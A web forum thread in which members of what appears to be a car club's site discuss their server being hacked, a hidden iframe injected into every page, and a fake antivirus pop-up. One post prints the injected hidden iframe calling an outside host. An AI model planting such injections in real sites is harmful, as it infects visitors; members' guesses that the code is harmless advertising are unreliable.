Jump to content
MK2CAV.COM
Sign in to follow this  
andy

RUSSIAN HACKERS ATTACK MK2CAV.COM

Recommended Posts

I'm being DEADLY serious here people. Please don't give out any payment details or change passwords at the mo -

I'VE MESSAGED CASPER SO HOPEFULLY HE WILL HAVE A LOOK. I CANT LOG IN AND TURN OFF THE SITE. J

ust dont re-sign in or give out any details. SHould still hopefully work fine for now, just be careful.

Basically people ahve got onto the webserver where our forum is and seeded loads of advertising code. As its in russia (.ru) I think its best safe than sorry. This shouldnt affect your computer at all, but even if it could do so long as you have a firewall and antivirus you will be fine.

Share this post


Link to post
Share on other sites

There was a message:

mk2cav.com till today!

is that what you mean?

Share this post


Link to post
Share on other sites

This is more likely advert, spyware, malware etc.. there is no real way it could be damaging your machine, if you ahve a good antivirus it would flag it up. its more likely hopeing to get people using their credit card details etc i would ahve thuoght scanning all our keypresses!

Share this post


Link to post
Share on other sites

Done some research and it looks like the ftp may have given in as its only trying to insert advertisements on every page.

Here is the code from the page casper if you read this:

<iframe src="http://c3q.at:8080/ts/in.cgi?pepsi134" width=125 height=125 style="visibility: hidden"></iframe>

Right before the head tag, looks like the standard iframe hack, can we recover and just change ftp dir or something? What do you think?

Share this post


Link to post
Share on other sites

Right sone some more research, this is due to fasthosts shitty server security and itl be f**king up the file syntax too if it keeps seeding.

It IS the old iframe hack. from all the affected files - search it I guess? Sometimes it is injected randomly, can't do any more until I've spoken to casper about it as thre may just be a patch we can get to get around it.

Share this post


Link to post
Share on other sites
Guest chris m

Has the site changed slightly following this? since yesterday every time i log on, it opens on the home page, text is bigger and on the forum link, i have to select each topic to look for new replies. before, every time i logged on, it opened on a page showing all the topics with new  on the right hand side of the screen. i'm confused now ???

Share this post


Link to post
Share on other sites

Has the site changed slightly following this? since yesterday every time i log on, it opens on the home page, text is bigger and on the forum link, i have to select each topic to look for new replies. before, every time i logged on, it opened on a page showing all the topics with new  on the right hand side of the screen. i'm confused now ???

Same here?

Share this post


Link to post
Share on other sites

I also have a your computer is infected bubble coming up since i went on the site yesterday. Is it just coincidence that me and blitz got this message or did it come through the site somehow?

Share this post


Link to post
Share on other sites

Can you take a pic of it? Do you mean at the top of the screen? Or somewhere else? Is your antivirus up to date? Do you have a firewall etc..etc..

It's probably just an ad trying it on to make you click stuff. Site will be restored tonight I think, I've spoken to Casper today about it.

Share this post


Link to post
Share on other sites

This is what has infected me with the baloons pop ups

PC Antispyware 2010 is another rogue security program

from the same family as WinReanimator, PC Security 2009 and Home Antivirus 2010. The bogus application is promoted through the use of Trojan Braviax. This Trojan virus displays fake security alerts about possible or supposedly existing malware infections. The main goal of PCAntispyware 2010 is to coerce you into purchasing the program. You should uninstall PC Antispyware 2010 from your PC if it is already infected.

http://www.2-spyware.com/remove-pc-antispyware-2010.html

Share this post


Link to post
Share on other sites

I really like this bit

What is more, PC_Antispyware 2010 will block antivirus programs to protect itself from being detected and removed. Likely, you won't be able to download and install other security programs as well. The rogue program will hijack Internet Explorer and Mozilla Firefox and redirect you to various misleading websites that promote malware.

Share this post


Link to post
Share on other sites

That happened to my laptop last year, didn't catch it in time and it nearly wiped my memory clean. Had to take it to a shop and get the guy to retrieve everything. Total pain in the ar$e

Share this post


Link to post
Share on other sites

Its a bubble that pops up at the bottom right of the screen, from one of the icons near the clock. antivirus and firewall are both up to date. The bubble says the following:

Your computer is infected!

windows as detected spyware infection!

It is recommended to use special antispyware tools to pervent data loss. Windows will now download and install te most up-to-date antispyware for you.

Click here to protect your computer from spyware!

P.S. I know i put pervent instead of prevent but this is how it is in the bubble.

Share this post


Link to post
Share on other sites

Im going to state the obvious here but DO NOT CLICK THE BUBBLE!

If you have antivirus or anti spyware software installed (and you should!) run a scan.

On the grand scale of things these programes are not the worst by a long way but the less chance they get the better.

Share this post


Link to post
Share on other sites

Norton blocked this a couple of days ago on my machine, so it seems to work ;D ;D ;D  In the meantime, the site is a bit of a mess but I assume it is being worked on :D :D :D

Share this post


Link to post
Share on other sites

Casper re-set us to a standard install, so certain bells and whistles and all the site content is not available for now. I know we have been in discussion about moving this to a better server anyway, so this may have been the last straw. But for now, we are here in essence.

Windows defender or any strong antivirus should have kept anything nasty at bay, I know of a couple people I have to help check out everything is ok, but it should be fine.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...